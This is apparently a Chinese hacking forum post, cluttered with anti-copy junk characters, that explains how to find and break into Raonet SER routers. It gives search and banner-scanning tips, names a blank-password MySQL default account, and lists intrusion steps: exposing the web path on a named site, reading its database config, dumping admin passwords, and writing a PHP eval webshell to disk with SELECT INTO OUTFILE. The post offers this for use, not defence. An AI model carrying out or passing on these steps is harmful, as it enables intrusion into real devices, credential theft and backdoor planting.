寻找存在漏洞的路由器方法:! h8 d# ^, l$ X0 ]5 `
: B0 {! V3 i' c& o
1:google搜索'Raonet Subscriber Ethernet Router'
% g9 P4 ^" A7 s+ p: C
: T6 `- n4 Z: E2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001' v( c1 b: M; X! y
6 K7 q- B( i8 B4 P: h0 B) ?+ g; S
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。: J( y+ j& D- ~) O/ l
8 o$ ?8 e7 n+ K% c3 H _//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......5 j$ n1 {+ e# C8 p! _& _0 Z
. b- X4 k; |* T* J+ d. w
- _+ Z2 q- y9 z4 S: e
+ |+ Q6 `7 B' U
入侵步骤:
. ~' F1 s- e5 M2 z$ h! e3 E. T W) T& k( D" ~
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
: ~ D+ ^6 n! u3 t- T9 ^* {4 r7 {
) |+ a9 h# a8 w. _* ?2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc' d" z, N6 K7 Z, ~7 _8 @
3:得到密码后连接,查看GUI管理密码:1 r" j# C* ?! f0 O8 y1 j
use ser_500
}: f- |; }3 E' Cselect id,passwd from user;
$ d9 i% y3 x' }5 D" r4:通过数据库写入webshell,执行命令:
$ ]$ ?5 C4 o0 T; K; a1 |use mysql;
( j0 k2 k( X* L6 N* m) C2 Xcreate table ok(cmd TEXT);6 z4 {3 }. s* x0 a! _% Y
insert into ok values("<?php @eval($_POST[cmd])?>");$ J& L( O% {; k# }' A1 L+ J' v
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";# |0 }* p6 u- D& B) T6 m
drop table ok;
, I) {% O( v1 T3 Q$ O: F
. B9 G4 T5 L$ B: x |5:连接后门shell.php $ N4 E8 ~! }% ^+ R! l. W+ e
5 m/ Y2 B7 P/ T2 s: w& W7 v; O
6. 搞定!
7 `. F% u& ~7 C; R" n' l! G
! ]0 t2 z% Q2 [$ x |